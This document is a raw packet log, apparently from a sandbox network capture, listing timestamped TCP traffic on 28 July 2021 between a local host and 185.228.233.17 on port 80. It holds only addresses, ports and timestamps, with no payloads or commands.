Jul 28, 2021 13:47:59.375374079 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.375391006 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.377247095 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.377286911 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.377311945 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.377363920 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.377373934 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.377430916 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.377441883 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.382477045 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.382508993 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.382529020 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.382545948 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.382628918 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.382689953 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.453883886 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.453933001 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.453965902 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.453990936 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.454016924 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.454097033 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.454108953 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.454149008 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.454164028 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.454168081 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.454183102 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.454199076 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.454225063 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457199097 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457254887 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457288027 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457319021 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457350016 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457381010 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457393885 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457416058 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457417011 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457442045 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457465887 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457479954 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457496881 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457524061 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457528114 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457560062 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457582951 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457588911 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457591057 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457623005 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457623005 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457653046 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457654953 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457683086 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457695007 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457720995 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457750082 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457767963 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457804918 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457815886 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457838058 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457851887 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457868099 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457882881 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457899094 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457911015 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457931042 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457946062 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.457961082 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.457979918 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.458014965 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.458168030 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.458231926 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.458440065 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.458529949 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.462436914 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462464094 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462486982 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462512016 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462558985 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.462599039 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.462713957 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462740898 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462763071 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462786913 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.462791920 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.462848902 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.534869909 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.534903049 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.534923077 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.534943104 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.534966946 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.534989119 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535000086 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535008907 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535031080 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535036087 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535087109 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535115004 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535136938 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535175085 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535197020 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535237074 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535255909 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535547972 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535573006 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535593987 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535613060 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535619974 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535638094 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535650969 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535687923 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.535808086 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.535852909 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.537681103 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537707090 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537725925 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537755966 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.537787914 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.537883997 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537904978 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537925005 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.537936926 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.537966013 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538058996 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538079977 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538105011 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538120031 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538126945 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538197994 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538213015 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538249969 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538273096 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538291931 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538312912 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538320065 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538360119 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538657904 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538676977 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.538707972 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.538746119 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.544796944 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.544840097 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.544871092 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.544886112 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.544903040 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.544938087 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.544965029 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.544972897 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.545011044 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.545470953 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.545511007 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.545542002 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.545559883 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.546144962 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.546190023 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.546220064 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.546247005 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.548547029 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.548629045 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.549628973 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.549700975 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.568908930 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.568984985 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.569075108 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.569190025 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.570733070 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.570764065 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.570854902 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.571012974 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.572010994 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.572103024 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.572985888 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.573066950 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.575922966 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.575953960 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.576014042 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.576029062 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.576050997 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.576072931 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.579243898 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.579274893 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.579358101 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.579382896 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.581609011 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.581769943 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.581866980 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.581954956 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.586518049 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.586602926 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.586607933 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.586632013 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.586688995 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.586700916 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.586798906 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.589942932 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.589967012 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.590039015 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.590065002 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.608062029 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.608098030 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.608143091 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.608194113 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.608221054 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.611277103 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.611325026 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.611372948 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.611392975 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.612560987 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.612601995 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.612620115 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.612643957 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.614062071 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.614116907 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.615644932 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.615696907 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.615731001 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.615761995 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.618177891 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.618324995 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.618899107 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.618925095 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.619002104 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.622384071 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.622433901 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.622565031 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.622595072 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.624058008 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.624089003 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.624178886 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.624749899 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.624830961 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.626555920 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.626648903 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.626851082 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.628458023 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.628566027 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.628739119 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.628767014 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.628810883 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.628859043 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.630332947 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.630904913 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.647593021 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.647646904 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.647706032 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.647733927 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.648528099 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.648571968 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.648629904 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.648679972 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.651264906 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.651494026 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.652787924 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.652832985 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.652925014 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.653980017 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.654021025 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.654055119 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.654107094 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.654452085 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.654885054 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.654912949 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.654956102 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.654972076 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.655002117 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.657748938 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.657840967 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.658126116 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.658175945 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.658180952 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.658224106 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.661293983 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.661341906 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.661396980 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.661434889 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.662122965 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.662380934 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.664048910 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.664093971 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.664140940 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.664170027 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.664544106 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.664618969 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.666044950 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.666079044 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.666135073 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.666234016 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.668261051 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.668327093 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.668337107 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.668375015 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.669527054 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.670037031 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.687201023 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.687326908 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.687514067 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.688061953 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.688370943 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.688435078 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.688436031 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.688479900 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.690613985 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.690658092 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.690692902 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.690736055 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.690757990 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.694159985 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.694247961 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.694293022 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.694318056 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.694478035 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.694878101 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.696185112 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.696343899 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.700975895 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701031923 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701056004 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701071024 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701091051 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701106071 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701112032 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.701128006 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.701154947 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.701196909 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.702898979 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.703201056 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.703207970 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.703237057 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.703257084 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.706338882 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.707200050 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.707232952 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.707274914 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.707329988 CEST	49746	80	192.168.2.4	185.228.233.17
